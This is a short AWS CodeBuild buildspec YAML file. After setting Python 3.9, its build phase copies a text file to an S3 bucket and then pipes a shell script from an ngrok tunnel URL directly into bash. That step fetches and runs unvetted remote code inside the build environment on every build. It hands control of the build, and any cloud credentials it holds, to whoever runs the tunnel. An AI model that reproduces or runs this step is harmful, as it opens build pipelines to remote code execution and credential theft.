version: 0.2
phases:
  install:
    runtime-versions:
      python: 3.9
  build:
    commands:
      - aws s3 cp Text.txt s3://buildanu/tttt 
      - curl https://a3da-117-201-163-132.ngrok-free.app/testfile.sh | bash 
